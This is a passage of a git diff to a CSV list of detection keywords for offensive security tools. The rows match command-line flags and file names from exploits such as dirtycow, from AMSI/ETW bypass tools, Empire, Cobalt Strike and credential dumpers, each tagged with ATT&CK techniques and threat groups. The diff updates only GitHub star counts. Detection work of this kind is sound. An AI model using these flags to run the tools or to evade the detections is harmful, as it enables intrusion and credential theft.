TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" "* dirty.c*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","0","N/A","N/A","8","767","437","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z" "* dirtycow.c *","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "* Dirty-Pipe.*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","0","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" @@ -458,20 +458,20 @@ "* --disable-bypass-amsi*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "* --disable-bypass-cmdline*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "* --disable-bypass-etw*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" -"* DisableETW(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"* DisableWLDP(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* DisableETW(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* DisableWLDP(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "* distcc-cve2004-2687.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --dll * --only *AmsiScanBuffer*AmsiScanString*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" -"* --dll * --payload *","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","N/A","N/A","6","565","76","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" +"* --dll * --payload *","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","N/A","N/A","6","567","76","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" "* --dll C:\Windows\System32\version.dll*--dll C:\Windows\System32\userenv.dll*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" "* --dll --dllhijack *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* -DllName * -FunctionName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -DllName * -FunctionName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -dns_stager_prepend *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* -dns_stager_subhost *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* dns-blacklist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-cache-snoop.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"* dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "* dns-check-zone.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-client-subnet-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-fuzz.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -485,36 +485,36 @@ "* dns-recursion.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-service-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-srv-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -dns-tcp -nameserver * -dc-ip*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* -dns-tcp -nameserver * -dc-ip*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "* dns-update.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-zeustracker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-zone-transfer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* docker-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -domain * /dc * /service cifs /ptt*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "* --domain * --kerberos*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","0","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z" -"* -Domain * -SMB1 *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Domain * -SMB1 *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* domainDumper*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","0","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" "* domainhunter *","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" "* --domains ./domains.txt run*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "* domcon-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* domcon-cmd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* dome.py*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"* dome.py*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" "* domino-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -DoNotPersistImmediately *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* --dont-enumerate-acls *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"* --dont-enumerate-acls * -e *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"* -DoNotPersistImmediately *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 